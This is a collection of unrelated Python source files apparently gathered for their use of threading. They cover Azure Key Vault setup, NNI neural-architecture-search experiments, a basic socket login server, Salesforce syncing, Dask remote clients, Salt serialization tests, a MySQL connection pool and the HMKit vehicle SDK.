CertificatePermissions.managecontacts,
CertificatePermissions.getissuers,
CertificatePermissions.listissuers,
CertificatePermissions.setissuers,
CertificatePermissions.deleteissuers,
CertificatePermissions.manageissuers,
CertificatePermissions.recover])
try:
object_id = _get_current_user_object_id(graph_client)
except GraphErrorException:
object_id = _get_object_id(graph_client, subscription=subscription)
if not object_id:
raise CLIError('Cannot create vault.\n'
'Unable to query active directory for information '
'about the current user.\n'
'You may try the --no-self-perms flag to create a vault'
' without permissions.')
access_policies = [AccessPolicyEntry(tenant_id=tenant_id,
object_id=object_id,
permissions=permissions)]
properties = VaultProperties(tenant_id=tenant_id,
sku=KeyVaultSku(name=sku),
access_policies=access_policies,
vault_uri=None,
enabled_for_deployment=enabled_for_deployment,
enabled_for_disk_encryption=enabled_for_disk_encryption,
enabled_for_template_deployment=enabled_for_template_deployment)
parameters = VaultCreateOrUpdateParameters(location=location,
tags=tags,
properties=properties)
client = keyvault_client_factory(cli_ctx).vaults
return client.create_or_update(resource_group_name=resource_group_name,
vault_name=vault_name,
parameters=parameters)
_create_keyvault.__doc__ = VaultProperties.__doc__
# pylint: disable=inconsistent-return-statements
def _get_current_user_object_id(graph_client):
try:
current_user = graph_client.objects.get_current_user()
if current_user and current_user.object_id: # pylint:disable=no-member
return current_user.object_id # pylint:disable=no-member
except CloudError:
pass
def _get_object_id_by_spn(graph_client, spn):
accounts = list(graph_client.service_principals.list(
filter="servicePrincipalNames/any(c:c eq '{}')".format(spn)))
if not accounts:
logger.warning("Unable to find user with spn '%s'", spn)
return None
if len(accounts) > 1:
logger.warning("Multiple service principals found with spn '%s'. "
"You can avoid this by specifying object id.", spn)
return None
return accounts[0].object_id
def _get_object_id_by_upn(graph_client, upn):
accounts = list(graph_client.users.list(
filter="userPrincipalName eq '{}'".format(upn)))
if not accounts:
logger.warning("Unable to find user with upn '%s'", upn)
return None
if len(accounts) > 1:
logger.warning("Multiple users principals found with upn '%s'. "
"You can avoid this by specifying object id.", upn)
return None
return accounts[0].object_id
def _get_object_id_from_subscription(graph_client, subscription):
if subscription['user']:
if subscription['user']['type'] == 'user':
return _get_object_id_by_upn(graph_client, subscription['user']['name'])
elif subscription['user']['type'] == 'servicePrincipal':
return _get_object_id_by_spn(graph_client, subscription['user']['name'])
else:
logger.warning("Unknown user type '%s'",
subscription['user']['type'])
else:
logger.warning('Current credentials are not from a user or service principal. '
'Azure Key Vault does not work with certificate credentials.')
def _get_object_id(graph_client, subscription=None, spn=None, upn=None):
if spn:
return _get_object_id_by_spn(graph_client, spn)
if upn:
return _get_object_id_by_upn(graph_client, upn)
return _get_object_id_from_subscription(graph_client, subscription)
def _get_template_file_and_parameters_file(linux=None):
script_dir = os.path.dirname(os.path.realpath(__file__))
template_parameter_folder = ""
if linux:
template_parameter_folder = os.path.join('template', 'linux')
else:
template_parameter_folder = os.path.join('template', 'windows')
parameter_file = os.path.join(
script_dir, template_parameter_folder, 'parameter.json')
template_file = os.path.join(
script_dir, template_parameter_folder, 'template.json')
return parameter_file, template_file
def _set_parameters_for_default_template(cluster_location,
cluster_name,
admin_password,
certificate_thumbprint,
vault_id,
certificate_id,
reliability_level,
admin_name,
cluster_size,
durability_level,
vm_sku,
os_type,
linux):
parameter_file, _ = _get_template_file_and_parameters_file(linux)
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
parameters['clusterLocation']['value'] = cluster_location
parameters['clusterName']['value'] = cluster_name
parameters['adminUserName']['value'] = admin_name
parameters['adminPassword']['value'] = admin_password
parameters['certificateThumbprint']['value'] = certificate_thumbprint
parameters['sourceVaultvalue']['value'] = vault_id
parameters['certificateUrlvalue']['value'] = certificate_id
parameters['reliabilityLevel']['value'] = reliability_level
parameters['nt0InstanceCount']['value'] = int(cluster_size)
parameters['durabilityLevel']['value'] = durability_level
parameters['vmSku']['value'] = vm_sku
parameters['vmImageSku']['value'] = os_type
return parameters
def _set_parameters_for_customize_template(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file):
cli_ctx = cli_ctx
parameters = get_file_json(parameter_file)['parameters']
if parameters is None:
raise CLIError('Invalid parameters file')
if SOURCE_VAULT_VALUE in parameters and CERTIFICATE_THUMBPRINT in parameters and CERTIFICATE_URL_VALUE in parameters:
logger.info('Found primary certificate parameters in parameters file')
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
output_file = result[3]
else:
if SOURCE_VAULT_VALUE not in parameters and CERTIFICATE_THUMBPRINT not in parameters and CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Primary certificate parameters are not present in parameters file')
else:
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
if SEC_SOURCE_VAULT_VALUE in parameters and SEC_CERTIFICATE_THUMBPRINT in parameters and SEC_CERTIFICATE_URL_VALUE in parameters:
logger.info('Found secondary certificate parameters in parameters file')
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
parameters[SOURCE_VAULT_VALUE]['value'] = result[0]
parameters[CERTIFICATE_URL_VALUE]['value'] = result[1]
parameters[CERTIFICATE_THUMBPRINT]['value'] = result[2]
else:
if SEC_SOURCE_VAULT_VALUE not in parameters and SEC_CERTIFICATE_THUMBPRINT not in parameters and SEC_CERTIFICATE_URL_VALUE not in parameters:
logger.info(
'Secondary certificate parameters are not present in parameters file')
else:
raise CLIError('The primary certificate parameters names in the parameters file should be specified with' + '\'sourceVaultValue\',\'certificateThumbprint\',\'certificateUrlValue\',' +
'if the secondary certificate parameters are specified in the parameters file, the parameters names should be specified with' + '\'secSourceVaultValue\',\'secCertificateThumbprint\',\'secCertificateUrlValue\'')
return parameters, output_file
def _modify_template(linux):
_, template_file = _get_template_file_and_parameters_file(linux)
template = get_file_json(template_file)
return template
|
pytorch.py
|
import logging
from dataclasses import dataclass
from pathlib import Path
from subprocess import Popen
from threading import Thread
from typing import Any, List, Optional, Union
import torch
import torch.nn as nn
from nni.experiment import Experiment, TrainingServiceConfig
from nni.experiment.config import util
from nni.experiment.config.base import ConfigBase, PathLike
from nni.experiment.pipe import Pipe
from ..converter import convert_to_graph
from ..graph import Model, Evaluator
from ..integration import RetiariiAdvisor
from ..mutator import Mutator
from ..nn.pytorch.mutator import process_inline_mutation
from ..strategy import BaseStrategy
from ..oneshot.interface import BaseOneShotTrainer
_logger = logging.getLogger(__name__)
@dataclass(init=False)
class RetiariiExeConfig(ConfigBase):
experiment_name: Optional[str] = None
search_space: Any = '' # TODO: remove
trial_command: str = 'python3 -m nni.retiarii.trial_entry'
trial_code_directory: PathLike = '.'
trial_concurrency: int
trial_gpu_number: int = 0
max_experiment_duration: Optional[str] = None
max_trial_number: Optional[int] = None
nni_manager_ip: Optional[str] = None
debug: bool = False
log_level: Optional[str] = None
experiment_working_directory: Optional[PathLike] = None
# remove configuration of tuner/assessor/advisor
training_service: TrainingServiceConfig
def __init__(self, training_service_platform: Optional[str] = None, **kwargs):
super().__init__(**kwargs)
if training_service_platform is not None:
assert 'training_service' not in kwargs
self.training_service = util.training_service_config_factory(platform = training_service_platform)
def validate(self, initialized_tuner: bool = False) -> None:
super().validate()
@property
def _canonical_rules(self):
return _canonical_rules
@property
def _validation_rules(self):
return _validation_rules
_canonical_rules = {
'trial_code_directory': util.canonical_path,
'max_experiment_duration': lambda value: f'{util.parse_time(value)}s' if value is not None else None,
'experiment_working_directory': util.canonical_path
}
_validation_rules = {
'trial_code_directory': lambda value: (Path(value).is_dir(), f'"{value}" does not exist or is not directory'),
'trial_concurrency': lambda value: value > 0,
'trial_gpu_number': lambda value: value >= 0,
'max_experiment_duration': lambda value: util.parse_time(value) > 0,
'max_trial_number': lambda value: value > 0,
'log_level': lambda value: value in ["trace", "debug", "info", "warning", "error", "fatal"],
'training_service': lambda value: (type(value) is not TrainingServiceConfig, 'cannot be abstract base class')
}
class RetiariiExperiment(Experiment):
def __init__(self, base_model: nn.Module, trainer: Union[Evaluator, BaseOneShotTrainer],
applied_mutators: List[Mutator] = None, strategy: BaseStrategy = None):
# TODO: The current design of init interface of Retiarii experiment needs to be reviewed.
self.config: RetiariiExeConfig = None
self.port: Optional[int] = None
self.base_model = base_model
self.trainer = trainer
self.applied_mutators = applied_mutators
self.strategy = strategy
self._dispatcher = RetiariiAdvisor()
self._dispatcher_thread: Optional[Thread] = None
self._proc: Optional[Popen] = None
self._pipe: Optional[Pipe] = None
def _start_strategy(self):
try:
script_module = torch.jit.script(self.base_model)
except Exception as e:
_logger.error('Your base model cannot be parsed by torch.jit.script, please fix the following error:')
raise e
base_model_ir = convert_to_graph(script_module, self.base_model)
base_model_ir.evaluator = self.trainer
# handle inline mutations
mutators = process_inline_mutation(base_model_ir)
if mutators is not None and self.applied_mutators:
raise RuntimeError('Have not supported mixed usage of LayerChoice/InputChoice and mutators, '
'do not use mutators when you use LayerChoice/InputChoice')
if mutators is not None:
self.applied_mutators = mutators
_logger.info('Starting strategy...')
Thread(target=self.strategy.run, args=(base_model_ir, self.applied_mutators)).start()
_logger.info('Strategy started!')
def start(self, port: int = 8080, debug: bool = False) -> None:
"""
Start the experiment in background.
This method will raise exception on failure.
If it returns, the experiment should have been successfully started.
Parameters
----------
port
The port of web UI.
debug
Whether to start in debug mode.
"""
super().start(port, debug)
self._start_strategy()
def _create_dispatcher(self):
return self._dispatcher
def run(self, config: RetiariiExeConfig = None, port: int = 8080, debug: bool = False) -> str:
"""
Run the experiment.
This function will block until experiment finish or error.
"""
if isinstance(self.trainer, BaseOneShotTrainer):
self.trainer.fit()
else:
assert config is not None, 'You are using classic search mode, config cannot be None!'
self.config = config
super().run(port, debug)
def export_top_models(self, top_n: int = 1):
"""
export several top performing models
"""
if top_n != 1:
_logger.warning('Only support top_n is 1 for now.')
if isinstance(self.trainer, BaseOneShotTrainer):
return self.trainer.export()
else:
_logger.info('For this experiment, you can find out the best one from WebUI.')
def retrain_model(self, model):
"""
this function retrains the exported model, and test it to output test accuracy
"""
raise NotImplementedError
|
server3.py
|
import socket
import csv
import traceback
import threading
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
usrpass={}
def openfile():
filename="login_credentials.csv"
with open(filename,'r')as csvfile:
csv_file = csv.reader(csvfile, delimiter=",")
for col in csv_file:
usrpass[col[0]]=col[1]
usrpass.pop("Username")
#print(usrpass)
ihost=socket.gethostname()
host=socket.gethostbyname(ihost)
ihost=socket.gethostname()
host=socket.gethostbyname(ihost)
iport=[]
hostfile="host.csv"
with open(hostfile,'r')as host_file:
csv_hfile = csv.reader(host_file, delimiter=",")
for row in csv_hfile:
iport.append(row[1])
port=int(iport[4])
def socketbind():
try:
s.bind(('',port))
print("Bind with host at port number : "+str(port))
s.listen(10)
print("Socket is listening!!")
except socket.error as msg:
print("Error in Binding: "+ str(msg)+"\n Retrying....")
socketbind()
def socketaccept():
conn,add=s.accept()
print("connection is established with IP : "+str(add[0])+" and Port Number : "+str(add[1]))
conn.send(bytes("1","utf-8"))
conversation(conn)
conn.close()
def conversation(conn):
while True:
username=str(conn.recv(1024),"utf-8")
password=str(conn.recv(1024),"utf-8")
res=checkpass(username,password)
if res==1:
print("Valid Password!")
conn.send(bytes("1","utf-8"))
conn.send(bytes("1","utf-8"))
else:
conn.send(bytes("-1","utf-8"))
conn.send(bytes("-1","utf-8"))
# def checkusr(username):
# if username in usrpass:
# return 1
# else:
# print("Invalid Username")
# return -1
def checkpass(username,password):
if usrpass[username]==password:
return 1
else:
print("Invalid Password")
return -1
def main():
openfile()
socketbind()
socketaccept()
# count=0
# while (count<6):
# new_thread=threading.Thread(target =socketaccept)
# new_thread.start()
# count=count+1
main()
|
contact.py
|
from common.models import Tag
from .client import SalesforceClient
import json
import requests
import threading
''' Contributor model maps to the Contact object in Salesforce '''
client = SalesforceClient()
def run(request):
response = SalesforceClient().send(request)
def save(contributor: object):
data = {
"ownerid": client.owner_id,
"firstname": contributor.first_name,
"lastname": contributor.last_name,
"email": contributor.username,
"phone": contributor.phone_primary,
"mailingpostalcode": contributor.postal_code,
"mailingcountry": contributor.country,
"npo02__membershipjoindate__c": contributor.date_joined.strftime('%Y-%m-%d'),
"description": contributor.about_me,
'technologies__c': Tag.tags_field_descriptions(contributor.user_technologies)
}
req = requests.Request(
method="PATCH",
url=f'{client.contact_endpoint}/platform_id__c/{contributor.id}',
data=json.dumps(data),
)
thread = threading.Thread(target=run, args=(req,))
thread.daemon = True
thread.start()
def delete(contributor: object):
req = requests.Request(
method="DELETE",
url=f'{client.contact_endpoint}/platform_id__c/{contributor.id}'
)
thread = threading.Thread(target=run, args=(req,))
thread.daemon = True
thread.start()
|
remote.py
|
import os
import time
import signal
import logging
import subprocess
import concurrent
from threading import Thread
import multiprocessing as mp
from distributed import Client
from .ssh_helper import start_scheduler, start_worker
__all__ = ['Remote']
logger = logging.getLogger(__name__)
class Remote(Client):
LOCK = mp.Lock()
REMOTE_ID = mp.Value('i', 0)
def __init__(self, remote_ip=None, port=None, local=False, ssh_username=None,
ssh_port=22, ssh_private_key=None, remote_python=None,
remote_dask_worker="distributed.cli.dask_worker"):
self.service = None
if not local:
remote_addr = (remote_ip + ':{}'.format(port))
self.service = DaskRemoteService(remote_ip, port, ssh_username,
ssh_port, ssh_private_key, remote_python,
remote_dask_worker)
super(Remote, self).__init__(remote_addr)
else:
super(Remote, self).__init__(processes=False)
with Remote.LOCK:
self.remote_id = Remote.REMOTE_ID.value
Remote.REMOTE_ID.value += 1
def upload_files(self, files, **kwargs):
for filename in files:
self.upload_file(filename, **kwargs)
def shutdown(self):
self.close()
if self.service:
self.service.shutdown()
def __enter__(self):
return self
def __exit__(self, *args):
self.service.shutdown()
@classmethod
def create_local_node(cls, ip, port):
return cls(ip, port, local=True)
def __repr__(self):
reprstr = self.__class__.__name__ + ' REMOTE_ID: {}, \n\t'.format(self.remote_id) + \
super(Remote, self).__repr__()
return reprstr
class DaskRemoteService(object):
def __init__(self, remote_addr, scheduler_port, ssh_username=None,
ssh_port=22, ssh_private_key=None, remote_python=None,
remote_dask_worker="distributed.cli.dask_worker"):
self.scheduler_addr = remote_addr
self.scheduler_port = scheduler_port
self.ssh_username = ssh_username
self.ssh_port = ssh_port
self.ssh_private_key = ssh_private_key
self.remote_python = remote_python
self.remote_dask_worker = remote_dask_worker
self.monitor_thread = Thread()
# Start the scheduler node
self.scheduler = start_scheduler(
remote_addr,
scheduler_port,
ssh_username,
ssh_port,
ssh_private_key,
remote_python,
)
# Start worker nodes
self.worker = start_worker(
self.scheduler_addr,
self.scheduler_port,
remote_addr,
self.ssh_username,
self.ssh_port,
self.ssh_private_key,
self.remote_python,
self.remote_dask_worker,
)
self.start_monitoring()
def start_monitoring(self):
if self.monitor_thread.is_alive():
return
self.monitor_thread = Thread(target=self.monitor_remote_processes)
self.monitor_thread.start()
def monitor_remote_processes(self):
all_processes = [self.scheduler, self.worker]
try:
while True:
for process in all_processes:
while not process["output_queue"].empty():
try:
msg = process["output_queue"].get()
if 'distributed.' not in msg:
print(msg)
except Exception:
break
# Kill some time and free up CPU
time.sleep(0.1)
except KeyboardInterrupt:
self.shutdown()
def shutdown(self):
import tornado
all_processes = [self.worker, self.scheduler]
for process in all_processes:
process["input_queue"].put("shutdown")
process["thread"].join()
def __enter__(self):
return self
def __exit__(self, *args):
self.shutdown()
|
test_payload.py
|
# -*- coding: utf-8 -*-
'''
:codeauthor: Pedro Algarvio (pedro@algarvio.me)
tests.unit.payload_test
~~~~~~~~~~~~~~~~~~~~~~~
'''
# Import python libs
from __future__ import absolute_import, print_function, unicode_literals
import time
import errno
import threading
import datetime
# Import Salt Testing libs
from tests.support.unit import skipIf, TestCase
from tests.support.mock import NO_MOCK, NO_MOCK_REASON
# Import Salt libs
from salt.utils import immutabletypes
from salt.utils.odict import OrderedDict
import salt.exceptions
import salt.payload
# Import 3rd-party libs
import zmq
from salt.ext import six
import logging
log = logging.getLogger(__name__)
@skipIf(NO_MOCK, NO_MOCK_REASON)
class PayloadTestCase(TestCase):
def assertNoOrderedDict(self, data):
if isinstance(data, OrderedDict):
raise AssertionError(
'Found an ordered dictionary'
)
if isinstance(data, dict):
for value in six.itervalues(data):
self.assertNoOrderedDict(value)
elif isinstance(data, (list, tuple)):
for chunk in data:
self.assertNoOrderedDict(chunk)
def test_list_nested_odicts(self):
payload = salt.payload.Serial('msgpack')
idata = {'pillar': [OrderedDict(environment='dev')]}
odata = payload.loads(payload.dumps(idata.copy()))
self.assertNoOrderedDict(odata)
self.assertEqual(idata, odata)
def test_datetime_dump_load(self):
'''
Check the custom datetime handler can understand itself
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
idata = {dtvalue: dtvalue}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata)
self.assertEqual(
sdata,
b'\x81\xc7\x18N20010203T04:05:06.000007\xc7\x18N20010203T04:05:06.000007')
self.assertEqual(idata, odata)
def test_verylong_dump_load(self):
'''
Test verylong encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'jid': 20180227140750302662}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata)
idata['jid'] = '{0}'.format(idata['jid'])
self.assertEqual(idata, odata)
def test_immutable_dict_dump_load(self):
'''
Test immutable dict encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'dict': {'key': 'value'}}
sdata = payload.dumps({'dict': immutabletypes.ImmutableDict(idata['dict'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_immutable_list_dump_load(self):
'''
Test immutable list encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'list': [1, 2, 3]}
sdata = payload.dumps({'list': immutabletypes.ImmutableList(idata['list'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_immutable_set_dump_load(self):
'''
Test immutable set encoder/decoder
'''
payload = salt.payload.Serial('msgpack')
idata = {'set': ['red', 'green', 'blue']}
sdata = payload.dumps({'set': immutabletypes.ImmutableSet(idata['set'])})
odata = payload.loads(sdata)
self.assertEqual(idata, odata)
def test_odict_dump_load(self):
'''
Test odict just works. It wasn't until msgpack 0.2.0
'''
payload = salt.payload.Serial('msgpack')
data = OrderedDict()
data['a'] = 'b'
data['y'] = 'z'
data['j'] = 'k'
data['w'] = 'x'
sdata = payload.dumps({'set': data})
odata = payload.loads(sdata)
self.assertEqual({'set': dict(data)}, odata)
def test_mixed_dump_load(self):
'''
Test we can handle all exceptions at once
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
od = OrderedDict()
od['a'] = 'b'
od['y'] = 'z'
od['j'] = 'k'
od['w'] = 'x'
idata = {dtvalue: dtvalue, # datetime
'jid': 20180227140750302662, # long int
'dict': immutabletypes.ImmutableDict({'key': 'value'}), # immutable dict
'list': immutabletypes.ImmutableList([1, 2, 3]), # immutable list
'set': immutabletypes.ImmutableSet(('red', 'green', 'blue')), # immutable set
'odict': od, # odict
}
edata = {dtvalue: dtvalue, # datetime, == input
'jid': '20180227140750302662', # string repr of long int
'dict': {'key': 'value'}, # builtin dict
'list': [1, 2, 3], # builtin list
'set': ['red', 'green', 'blue'], # builtin set
'odict': dict(od), # builtin dict
}
sdata = payload.dumps(idata)
odata = payload.loads(sdata)
self.assertEqual(edata, odata)
def test_recursive_dump_load(self):
'''
Test recursive payloads are (mostly) serialized
'''
payload = salt.payload.Serial('msgpack')
data = {'name': 'roscivs'}
data['data'] = data # Data all the things!
sdata = payload.dumps(data)
odata = payload.loads(sdata)
self.assertTrue('recursion' in odata['data'].lower())
class SREQTestCase(TestCase):
port = 8845 # TODO: dynamically assign a port?
@classmethod
def setUpClass(cls):
'''
Class to set up zmq echo socket
'''
def echo_server():
'''
A server that echos the message sent to it over zmq
Optional "sleep" can be sent to delay response
'''
context = zmq.Context()
socket = context.socket(zmq.REP)
socket.bind("tcp://*:{0}".format(SREQTestCase.port))
payload = salt.payload.Serial('msgpack')
while SREQTestCase.thread_running.is_set():
try:
# Wait for next request from client
message = socket.recv(zmq.NOBLOCK)
msg_deserialized = payload.loads(message)
log.info('Echo server received message: %s', msg_deserialized)
if isinstance(msg_deserialized['load'], dict) and msg_deserialized['load'].get('sleep'):
log.info('Test echo server sleeping for %s seconds',
msg_deserialized['load']['sleep'])
time.sleep(msg_deserialized['load']['sleep'])
socket.send(message)
except zmq.ZMQError as exc:
if exc.errno == errno.EAGAIN:
continue
raise
SREQTestCase.thread_running = threading.Event()
SREQTestCase.thread_running.set()
SREQTestCase.echo_server = threading.Thread(target=echo_server)
SREQTestCase.echo_server.start()
@classmethod
def tearDownClass(cls):
'''
Remove echo server
'''
# kill the thread
SREQTestCase.thread_running.clear()
SREQTestCase.echo_server.join()
def get_sreq(self):
return salt.payload.SREQ('tcp://127.0.0.1:{0}'.format(SREQTestCase.port))
def test_send_auto(self):
'''
Test creation, send/rect
'''
sreq = self.get_sreq()
# check default of empty load and enc clear
assert sreq.send_auto({}) == {'enc': 'clear', 'load': {}}
# check that the load always gets passed
assert sreq.send_auto({'load': 'foo'}) == {'load': 'foo', 'enc': 'clear'}
def test_send(self):
sreq = self.get_sreq()
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
@skipIf(True, 'Disabled until we can figure out how to make this more reliable.')
def test_timeout(self):
'''
Test SREQ Timeouts
'''
sreq = self.get_sreq()
# client-side timeout
start = time.time()
# This is a try/except instead of an assertRaises because of a possible
# subtle bug in zmq wherein a timeout=0 actually exceutes a single poll
# before the timeout is reached.
log.info('Sending tries=0, timeout=0')
try:
sreq.send('clear', 'foo', tries=0, timeout=0)
except salt.exceptions.SaltReqTimeoutError:
pass
assert time.time() - start < 1 # ensure we didn't wait
# server-side timeout
log.info('Sending tries=1, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=1, timeout=1)
assert time.time() - start >= 1 # ensure we actually tried once (1s)
# server-side timeout with retries
log.info('Sending tries=2, timeout=1')
start = time.time()
with self.assertRaises(salt.exceptions.SaltReqTimeoutError):
sreq.send('clear', {'sleep': 2}, tries=2, timeout=1)
assert time.time() - start >= 2 # ensure we actually tried twice (2s)
# test a regular send afterwards (to make sure sockets aren't in a twist
log.info('Sending regular send')
assert sreq.send('clear', 'foo') == {'enc': 'clear', 'load': 'foo'}
def test_destroy(self):
'''
Test the __del__ capabilities
'''
sreq = self.get_sreq()
# ensure no exceptions when we go to destroy the sreq, since __del__
# swallows exceptions, we have to call destroy directly
sreq.destroy()
def test_raw_vs_encoding_none(self):
'''
Test that we handle the new raw parameter in 5.0.2 correctly based on
encoding. When encoding is None loads should return bytes
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
idata = {dtvalue: 'strval'}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata, encoding=None)
assert isinstance(odata[dtvalue], six.string_types)
def test_raw_vs_encoding_utf8(self):
'''
Test that we handle the new raw parameter in 5.0.2 correctly based on
encoding. When encoding is utf-8 loads should return unicode
'''
payload = salt.payload.Serial('msgpack')
dtvalue = datetime.datetime(2001, 2, 3, 4, 5, 6, 7)
idata = {dtvalue: 'strval'}
sdata = payload.dumps(idata.copy())
odata = payload.loads(sdata, encoding='utf-8')
assert isinstance(odata[dtvalue], six.text_type)
|
pool.py
|
# coding: utf-8
import gevent
from gevent import monkey
monkey.patch_all() # support for greenlet
import time
import pymysql
from threading import Lock
import config
class TooManyConnection(Exception):
""" when too many connection """
class MySQLPool(object):
def __init__(self):
self.pool = []
self.pool_grow_lock = Lock()
self.max_size = 50 # max size of connection pool
def _connect(self):
_config = {
"host": config.DB_HOST,
"port": config.DB_PORT,
"user": config.DB_USER,
"password": config.DB_PASS,
"database": config.DB_NAME,
}
# conn: Representation of a socket with a mysql server.
conn = pymysql.connect(**_config)
return conn
def _get_conn(self):
for conn, lock in self.pool:
if lock.acquire(False):
conn.ping() # will auto reconnect
return conn, lock
# pool need grow
self.pool_grow_lock.acquire()
if len(self.pool) < self.max_size:
conn = self._connect()
lock = Lock()
self.pool.append([conn, lock])
if lock.acquire(False):
self.pool_grow_lock.release()
return conn, lock
self.pool_grow_lock.release()
return None, None
def run_sql(self, sql, args=None):
conn = None
lock = None
for i in range(3):
conn, lock = self._get_conn()
if conn:
break
time.sleep(0.5)
if not conn:
raise TooManyConnection("too many connection, pool is exhausted, cannot get connection")
cursor = conn.cursor(cursor=pymysql.cursors.DictCursor)
cursor.execute(sql, args)
conn.commit() # always commit here
data = cursor.fetchall()
cursor.close()
lock.release() # give out conn
return data
_pool = MySQLPool()
run_sql = _pool.run_sql
__all__ = ["run_sql"]
""" test part """
if __name__ == "__main__":
# print run_sql("select * from user;")
import gevent
from gevent import monkey
monkey.patch_all()
jobs = []
for i in range(10):
jobs.append(gevent.spawn(run_sql, "select * from user;"))
gevent.joinall(jobs)
for i in jobs:
print i.value
"""
from threading import Thread
for i in range(100):
t = Thread(target=run_sql, args=("select * from user;", ))
t.start()
"""
|
utils.py
|
def test_concurrently(times):
"""
Add this decorator to small pieces of code that you want to test
concurrently to make sure they don't raise exceptions when run at the
same time. E.g., some Django views that do a SELECT and then a subsequent
INSERT might fail when the INSERT assumes that the data has not changed
since the SELECT.
"""
def test_concurrently_decorator(test_func):
def wrapper(*args, **kwargs):
exceptions = []
import threading
def call_test_func():
try:
test_func(*args, **kwargs)
except Exception, e:
exceptions.append(e)
raise
threads = []
for i in range(times):
threads.append(threading.Thread(target=call_test_func))
for t in threads:
t.start()
for t in threads:
t.join()
if exceptions:
raise Exception('test_concurrently intercepted %s exceptions: %s' % (len(exceptions), exceptions))
return wrapper
return test_concurrently_decorator
|
hmkit.py
|
#!/usr/bin/env python
"""
The MIT License
Copyright (c) 2014- High-Mobility GmbH (https://high-mobility.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys
import time
import os
import subprocess
import threading
import codecs
import base64
import logging
import socket
import sys
from datetime import datetime
from . import (
access_certificate,
device_certificate,
storage,
broadcaster,
link,
broadcastlistener,
linklistener,
autoapi,
hm_pyc,
bluetooth
)
from hmkit.autoapi import autoapi_dump
from hmkit.autoapi.identifiers import Identifiers
#-------- Logging Config ------------
logger = logging.getLogger('hmkit')
# define file handler and set formatter
file_handler = logging.FileHandler('hmlog_{:%Y-%m-%d-%H-%M-%S}.log'.format(datetime.now()))
formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(module)s():%(funcName)s:%(lineno)d : %(message)s')
#formatter = logging.Formatter('%(asctime)s : %(levelname)s : %(name)s : %(message)s')
file_handler.setFormatter(formatter)
# add file handler to logger
logger.addHandler(file_handler)
log = logger
class HmKit():
"""
Main class interface to initialize and access High mobility Python sdk hmkit
"""
__instance = None
@staticmethod
def get_instance():
"""
get the HmKit instance
:rtype: :class:`HmKit`. returns None if not created already.
"""
return HmKit.__instance
def set_logging_level(self, loglevel=logging.INFO):
"""
set logging level for logger
:param logging loglevel: python logging level for hmkit logs. logging.DEBUG,
logging.INFO, logging.WARNING ,logging.ERROR, logging.CRITICAL
:rtype: None
"""
logger.setLevel(loglevel)
def cmain_thread(self):
"""
thread function dedicated to c thread operations
"""
log.debug("PY: cmain_thread")
ret = hm_pyc.cmain_thread()
def hmkit_exit(self):
"""
terminate hmkit. this terminates the cthreads
"""
log.info("PY: ****** cthread_exit")
hm_pyc.cthread_exit()
time.sleep(1)
log.info("PY: return** cthread_exit")
def init_threads(self):
"""
create a python thread. which will be deligated for c
"""
##log.debug("Entered init_threads")
thread = threading.Thread(target=self.cmain_thread)
thread.start()
time.sleep(3)
def certificate_update(self, snippet):
"""
Parses and updates the certificate to :class:`device_certificate` and :class:`hm_pyc`
:param bytearray snippet: device certificate snippet
:rtype: None
"""
devCerts_snippet = []
devCerts_decoded = []
devCerts_snippet = snippet
##log.debug("PY: type of dev certs:" + str(type(devCerts_snippet)))
##log.debug("DevCert: " + str(devCerts_snippet[0]))
##log.debug("DevPrv: " + str(devCerts_snippet[1]))
##log.debug("IssPub: " + str(devCerts_snippet[2]))
